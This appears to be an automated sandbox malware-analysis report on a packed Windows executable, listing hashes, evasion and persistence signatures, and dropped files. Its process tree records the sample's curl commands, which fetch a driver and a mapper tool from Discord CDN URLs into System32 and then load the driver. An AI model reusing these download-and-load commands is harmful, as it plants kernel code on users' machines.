Overview

overview

9

Static

static

7

Yams_Servi...al.exe

windows7-x64

9

Yams_Servi...al.exe

windows10-2004-x64

9

Analysis

  • max time kernel
    30s
  • max time network
    32s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2023, 18:22

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Yams_Services_External.exe

  • Size

    3.5MB

  • MD5

    4240b6c1ab4629acc3927253194bb347

  • SHA1

    2dd45eca03940f3ec406a41dab511aff46b12f28

  • SHA256

    d3084cfdaaddce936b27ab95f651c27633938ae844b7858d3871bbc56b4437b2

  • SHA512

    4998f70111505b755710b2eafd13e2c52b95ab68cdd15ab82c4d6b46c0388a0d72b03206b2074364a824c3e92265c4c6c34083b8e876c7b1f41e02d5818be435

  • SSDEEP

    98304:aJcv8AMTa1spzA7IcKgoUxdu+/y8QTrCsGT:e0EA7X4Uxdx/y8dT

Score
9/10
evasionpersistencethemidatrojan

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Yams_Services_External.exe
    "C:\Users\Admin\AppData\Local\Temp\Yams_Services_External.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of WriteProcessMemory
    PID:4028
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
        PID:1056
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys >nul 2>&1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3276
        • C:\Windows\system32\curl.exe
          curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys
          3⤵
          • Drops file in System32 directory
          PID:2100
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe >nul 2>&1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4416
        • C:\Windows\system32\curl.exe
          curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe
          3⤵
          • Drops file in System32 directory
          PID:1924
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cls
        2⤵
          PID:1224
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:740
          • C:\Windows\System32\yamsmapper.exe
            C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys
            3⤵
            • Sets service image path in registry
            • Executes dropped EXE
            • Suspicious behavior: LoadsDriver
            • Suspicious use of AdjustPrivilegeToken
            PID:4836
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c cls
          2⤵
            PID:3196
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c pause >nul 2>&1
            2⤵
              PID:1392

          Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Windows\System32\yamsmapper.exe
                  Filesize

                  153KB

                  MD5

                  666d7f4bb7cf64772755b9a184486525

                  SHA1

                  a645d988ff67e72aac11cc9560dbf89a8320aef0

                  SHA256

                  a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577

                  SHA512

                  3670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864

                  Download Submit

                • C:\Windows\System32\yamsmapper.exe
                  Filesize

                  153KB

                  MD5

                  666d7f4bb7cf64772755b9a184486525

                  SHA1

                  a645d988ff67e72aac11cc9560dbf89a8320aef0

                  SHA256

                  a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577

                  SHA512

                  3670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864

                  Download Submit

                • C:\Windows\System32\yamsud.sys
                  Filesize

                  12KB

                  MD5

                  141ecbccc4bfbf03b8768232d5c6a273

                  SHA1

                  0e0c0340b8bccfd6aa352e80739c882e4bbe5404

                  SHA256

                  2be40511b4f941f899dcfc579c7f31cfd555292d325d7089a69be76bc9eab122

                  SHA512

                  aa0f0bdfab84a6b41006acf40ecfc87aa8bbe5a576d1e696e5c099140e0ac8b2d144d60b112f045dbcc7f13d21b34580b842fe42e9f38727688cddbc4f1787a7

                  Download Submit

                • memory/4028-156-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-157-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-136-0x00007FF793D20000-0x00007FF794687000-memory.dmp

                  Filesize

                  9.4MB

                  Download

                • memory/4028-135-0x00007FF793D20000-0x00007FF794687000-memory.dmp

                  Filesize

                  9.4MB

                  Download

                • memory/4028-134-0x00007FF793D20000-0x00007FF794687000-memory.dmp

                  Filesize

                  9.4MB

                  Download

                • memory/4028-145-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-146-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-147-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-148-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-149-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-150-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-151-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-152-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-153-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-154-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-133-0x00007FF793D20000-0x00007FF794687000-memory.dmp

                  Filesize

                  9.4MB

                  Download

                • memory/4028-137-0x00007FF793D20000-0x00007FF794687000-memory.dmp

                  Filesize

                  9.4MB

                  Download

                • memory/4028-155-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-158-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-159-0x00007FF793D20000-0x00007FF794687000-memory.dmp

                  Filesize

                  9.4MB

                  Download

                • memory/4028-160-0x00007FF793D20000-0x00007FF794687000-memory.dmp

                  Filesize

                  9.4MB

                  Download

                • memory/4028-161-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-163-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-164-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-162-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-165-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-166-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-167-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-169-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-168-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-170-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-171-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-172-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-173-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/4028-174-0x000001B45BCD0000-0x000001B45BCD1000-memory.dmp

                  Filesize

                  4KB

                  Download